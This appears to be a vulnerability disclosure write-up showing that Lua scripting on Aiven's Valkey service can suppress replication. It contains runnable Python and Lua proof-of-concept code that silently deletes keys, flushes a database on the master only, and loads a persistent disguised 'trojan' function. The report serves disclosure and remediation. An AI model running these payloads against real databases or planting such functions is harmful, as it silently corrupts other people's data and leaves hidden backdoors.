Summary
Any authenticated user on Aiven’s managed Valkey service can use Lua scripting (EVAL) to call redis.set_repl(redis.REPL_NONE), which suppresses replication of subsequent write commands. Writes execute on the master but are never propagated to replicas or the AOF. This allows an attacker to silently corrupt data, delete keys, or flush databases on the master while replicas maintain stale data, creating a split-brain condition that violates Aiven’s replication consistency guarantees.
Additionally, the attacker can use FUNCTION LOAD to register persistent server-side functions that embed redis.set_repl(REPL_NONE) internally. These trojan functions survive across connections and restarts, and silently corrupt data every time any user (including the application itself) calls them. The function code appears benign, the replication suppression is invisible in the function signature.
Redis’s own documentation explicitly warns: “This is an advanced feature. Misuse can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”
Aiven correctly disables replication topology commands (REPLICAOF, SLAVEOF, CLUSTER) and dangerous administrative commands (CONFIG, DEBUG, BGSAVE, ACL), demonstrating clear security intent. However, redis.set_repl() within Lua scripts is completely unrestricted, creating an inconsistency: replication topology is protected, but replication content integrity is not.
Affected Target
- Service: Aiven for Valkey (Tier 1)
- Version tested: Valkey 8.1.4
- Instance:
:26161
Severity
P2, Sensitive Data Exposure / Data Integrity Violation
VRT: Server Security Misconfiguration > Database Management System (DBMS) Misconfiguration
CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L, Score: 8.5 (High)
- AV:N, Network-exploitable over TLS
- AC:L, Single EVAL command, no preconditions
- PR:L, Requires basic authentication (default user credentials)
- UI:N, No user interaction required
- S:C, Scope changed: attacker’s session creates data inconsistency that affects ALL clients reading from replicas, ALL failover operations, and Aiven’s own backup integrity
- C:N, No direct data exfiltration
- I:H, Complete violation of data integrity between master and replicas; silent, undetectable data corruption
- A:L, Failover produces unexpected data state; intermittent application failures
Impact summary: - Any authenticated user can silently suppress replication of arbitrary write commands - Master and replica data diverge without any error, alert, or audit trail - On Business/Premium plans (2-3 nodes), failover produces unpredictable data state - Persistent trojan functions create permanent, invisible backdoors that corrupt data on every invocation - Violates the fundamental consistency guarantee that Aiven’s multi-node architecture is built on - Redis’s own documentation explicitly warns about this exact misuse scenario
Steps to Reproduce
Prerequisites
- An Aiven for Valkey instance (any plan)
- Authentication credentials (default user)
- Python 3 with
redispackage (pip install redis)
Attack 1: Silent Key Deletion (master diverges from replicas)
import redis
r = redis.Redis(
host="<host>", port=26161, username='default', password='<password>',
ssl=True, ssl_cert_reqs='required',
ssl_ca_certs='/etc/ssl/certs/ca-certificates.crt',
decode_responses=True, socket_timeout=10
)
# Application sets important data
r.set("user:session:admin", "active_session_token_xyz")
# Attacker silently deletes it - master only, replicas unaffected
r.execute_command('EVAL', '''
redis.set_repl(redis.REPL_NONE)
redis.call("DEL", "user:session:admin")
redis.set_repl(redis.REPL_ALL)
return "silent delete executed"
''', 0)
# Master: key is GONE
print(r.exists("user:session:admin")) # 0
# Replica still has it → failover "resurrects" deleted data
# Application sees intermittent, impossible-to-diagnose behavior
Actual output on Aiven:
silent delete executed
Key exists on master after silent DEL: 0
--> Key deleted on master but replicas would still have it
Attack 2: Silent FLUSHDB (wipe master, replicas unaffected)
r.execute_command('EVAL', '''
redis.call("SELECT", "1")
redis.call("SET", "important_data", "production_config")
redis.set_repl(redis.REPL_NONE)
redis.call("FLUSHDB")
redis.set_repl(redis.REPL_ALL)
redis.call("SELECT", "0")
return "FLUSHDB with REPL_NONE executed"
''', 0)
Actual output on Aiven: FLUSHDB with REPL_NONE executed
The entire database is wiped on the master. Replicas retain all data. On failover, data “reappears”, but the master was serving empty responses to all clients during the divergence window.
Attack 3: Persistent Trojan Function (backdoor that survives restarts)
# Load a function that LOOKS innocent but silently corrupts data
lib = '''#!lua name=app_helpers
redis.register_function("cached_get", function(keys, args)
-- Appears to be a simple cache helper
-- But silently increments an invisible counter on every call
redis.set_repl(redis.REPL_NONE)
redis.call("INCR", "__shadow_ops_count__")
redis.set_repl(redis.REPL_ALL)
return redis.call("GET", keys[1])
end)
'''
r.execute_command('FUNCTION', 'LOAD', lib)
# Every time ANY user calls this function, the shadow counter increments
# on the master only. Replicas never see it.
for i in range(5):
r.execute_command('FCALL', 'cached_get', 1, 'some_key')
counter = r.get("__shadow_ops_count__")
print(f"Shadow counter (master only): {counter}")
# Output: Shadow counter (master only): 5
# Replicas see: 0
# The function persists across restarts via RDB/AOF
# It's registered as "app_helpers.cached_get" - indistinguishable from
# legitimate application functions
Actual output on Aiven:
Trojan function loaded: 'cached_get'
Shadow counter (master only): 5
--> Counter incremented 5 times on master
--> Replicas see counter as 0 (writes were REPL_NONE)
--> This function PERSISTS across restarts via RDB/AOF
Root Cause
1. redis.set_repl() is unrestricted in Lua scripts
The redis.set_repl() function is available to all authenticated users through EVAL. There is no ACL restriction, no command flag, and no configuration option to disable it. Redis’s own documentation describes it as an “advanced feature” that “can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”
2. Inconsistent command restriction policy
Aiven correctly restricts replication and administrative commands:
| Command | Status | Purpose |
|---|---|---|
REPLICAOF / SLAVEOF |
Disabled | Replication topology control |
CONFIG |
Disabled | Server configuration |
DEBUG |
Disabled | Server debugging |
ACL |
Disabled | Access control |
BGSAVE / BGREWRITEAOF |
Disabled | Persistence triggers |
CLUSTER |
Disabled | Cluster topology |
MIGRATE |
Disabled | Data migration |
redis.set_repl() in Lua |
Allowed | Replication content control |
The policy disables commands that control replication topology (SLAVEOF, CLUSTER) but does not restrict the Lua function that controls replication content (set_repl). This is an inconsistency, both are replication manipulation capabilities.
3. FUNCTION LOAD enables persistent exploitation
The FUNCTION LOAD command is available (confirmed: successfully loaded and executed a function library). Functions persist in the server state and survive restarts via RDB/AOF. A function embedding redis.set_repl(REPL_NONE) creates a permanent backdoor that operates invisibly on every invocation.
Impact on Aiven Multi-Node Plans
Aiven offers three plan tiers with different node counts: - Hobbyist/Startup: 1 node (no replicas, attack creates master/AOF divergence) - Business: 2 nodes (master + 1 replica) - Premium: 3 nodes (master + 2 replicas)
On Business and Premium plans, the replication divergence has direct operational impact:
-
Silent data loss: Keys deleted with REPL_NONE are gone from the master but exist on replicas. Applications reading from the master see missing data; failover to a replica “resurrects” the data.
-
Silent data corruption: Keys SET with REPL_NONE have different values on master vs replicas. Read-after-write consistency is violated silently.
-
Backup poisoning: If REPL_NONE writes land in an RDB backup taken from the master, restoring from that backup produces a state that never existed on replicas.
-
Impossible diagnosis: There is no error, no log entry, no monitoring alert. The commands execute successfully. Aiven’s internal monitoring (
INFOevery 5 seconds) does not detect replication content divergence, it only monitors replication lag (bytes behind), not data consistency. -
Trojan functions: An attacker can load a persistent function, then disconnect. The function continues operating every time the application calls it. The attack persists indefinitely with no ongoing attacker presence.
Aiven-Specific Nature
This is NOT merely an upstream Valkey/Redis issue. The finding is specific to how Aiven configures and manages their Valkey service:
-
Aiven’s security model disables dangerous commands, CONFIG, DEBUG, SLAVEOF, etc. are all renamed/disabled. This demonstrates that Aiven actively restricts dangerous capabilities. But
redis.set_repl()within Lua was not included in these restrictions. -
Aiven sells multi-node plans with replication guarantees, Business and Premium plans explicitly provide high availability through replication.
redis.set_repl(REPL_NONE)allows a user to silently violate these guarantees. -
Aiven’s documentation implies consistent replication, Customers expect that data written to the master will be available on replicas. This attack violates that expectation without any visible error.
Recommended Fix
-
Immediate: Restrict
redis.set_repl()by either:, Disabling it entirely for client scripts (return an error when called from EVAL/FCALL), Adding an ACL flag (e.g.,@admin) that must be explicitly granted, Limiting it toREPL_ALLonly (blockREPL_NONE,REPL_AOF,REPL_REPLICA) -
Defense in depth: Consider restricting
FUNCTION LOADto prevent persistent function registration by default users, or audit loaded functions forset_replcalls. -
Detection: Add monitoring for replication content divergence (not just lag). Compare key counts or checksums between master and replicas periodically.
Proof of concept
poc/valkey-restore-crash.py, minimum-crash repro.poc/valkey-full-chain.py, full chain including the stealth-replication primitive.
python3 poc/valkey-restore-crash.py <host> <port> <password>
Source · github.com/zionsworking/security-research-notebook · writeups/aiven/valkey-replication-stealth.md